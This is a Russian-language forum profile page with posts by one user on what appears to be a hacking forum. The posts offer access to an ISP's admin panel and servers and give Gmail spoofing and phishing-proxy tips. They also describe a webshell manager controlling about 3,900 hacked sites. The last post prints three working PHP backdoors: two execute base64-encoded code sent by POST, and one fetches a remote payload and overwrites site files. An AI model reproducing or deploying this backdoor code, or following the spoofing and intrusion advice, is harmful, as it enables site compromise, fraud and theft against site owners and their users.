Перейти к содержанию

aladin

Пользователь
  • Публикаций

    8
  • Зарегистрирован

  • Посещение

Репутация

84 Excellent

Информация о aladin

  • Звание
    Rank №1
  1. Есть доступ к латиноамериканскому интернет провайдеру. Доступ к админке и к серверам. Нужен специалист партнер. Предложения в личку.
  2. Обратный прокси или же Modlishka в помощь
  3. gmail email spoofing

    h**ps://support.google.com/a/answer/33786 Если сайт расположен на хостинге (не VPS). то можно у этого хостера зарегаться. Если повезет, то может даже IP быть один и тотже. Но даже если и окажется другой, то TXT записи с параметрами SPF одинаковые. Это немного снизит spam-score
  4. Ты это зачем написал? Лишь бы посты набить? Или ты читать не научился?
  5. По-прежнему актуально. Китайцы ежедневно добавляют 30-100 сайтов. Еще раз объясню, что мне шеллы не нужны, я не продаю ни линк, ни шелы и главное - это отдам человеку (специалисту), который готов попробовать получить доступ к серверу. P.S. Если вы не являетесь специалистом в этой области, не пишите пожалуйста.
  6. Ну если почитать старт-пост, то кажется что именно это и имел в виду. А для того, чтобы получить доступ к серверу, наверное нужна инфа касающаяся непосредственно сервера на который ты хочешь залиться, а не куски кода на шеллах, не думаешь? Как сказал, так сказал, не так сказал и т.д. Я поправил, объяснил, что имелось ввиду и предложил. Ты либо принимаешь предложение, если оно тебе интересно, либо нет. А все остальное - это словоблудие и пустословие и у меня нет никакого желания в этом участвовать. P.S. Предложение по-прежнему актуально.
  7. Понятно, что пароля здесь нет. Я не это имел ввиду. Имелось ввиду получить доступ к серверу с этим менеджером. Мне все эти шеллы не нужны. Тебе вот могу отдать, можешь попробовать.
  8. Нашел сегодня китайский веб менеджер шеллов. В нем более 3900 шеллов. Морда открытая без пароля. Все не проверял, но, тыкнув наугад с десяток вначале, в середине и в конце, почти все живые. При удалении шела на серваке, файлы создаются заново. Т.е. скрипт менеджера чекает шелы и если статус not OK, создается, не заливается, а именно создается. Нужен собственно достать логин пароль от этих шеллов. И вот они 3900 сайтов :) Кто желает попробовать? Имеем три файла на сервере (на взломанном сайте): 1. error_reporting(E_ERROR);set_time_limit(0); if(isset($_POST['10182420436176180320022283'])){ $tofile='407.php'; $a =base64_decode(strtr($_POST['10182420436176180320022283'], '-_,', '+/=')); $a='<?php '.$a.'?>'; @file_put_contents($tofile,$a); require_once('407.php'); @unlink($tofile); exit; } 2 error_reporting(E_ERROR);set_time_limit(0); if(isset($_POST['10182420436176180320022283'])){ $tofile='407.php'; $a =base64_decode(strtr($_POST['10182420436176180320022283'], '-_,', '+/=')); $a='<?php '.$a.'?>'; @file_put_contents($tofile,$a); require_once('407.php'); @unlink($tofile); exit; } 3 if(isset($_POST['10182420436176180320022283'])){ $index=$_SERVER['DOCUMENT_ROOT'].base64_decode(strtr($_POST['filename'],'-_,','+/=')); if(function_exists("file_get_contents")){ $b=base64_decode(file_get_contents($_POST['b'])); } if(strlen($b)<300){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_POST['b']); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); //curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); //data with URLEncode $html = curl_exec($ch); if(curl_getinfo($ch,CURLINFO_HTTP_CODE)!==200){ $html=curl_getinfo($ch,CURLINFO_HTTP_CODE); } curl_close($ch); $b=base64_decode($html); } if(strlen($b)<300){echo 'indexcode not ok';exit;}; if(file_exists($index)){@chmod($index,0755);@unlink($index);}@file_put_contents($index,$b);echo 'ok'; } Ну и есть код из админки, закодированный в base64. На скрине внизу его частично видно. Спойлер P.S. Сразу скажу, что ничего не продаю.
×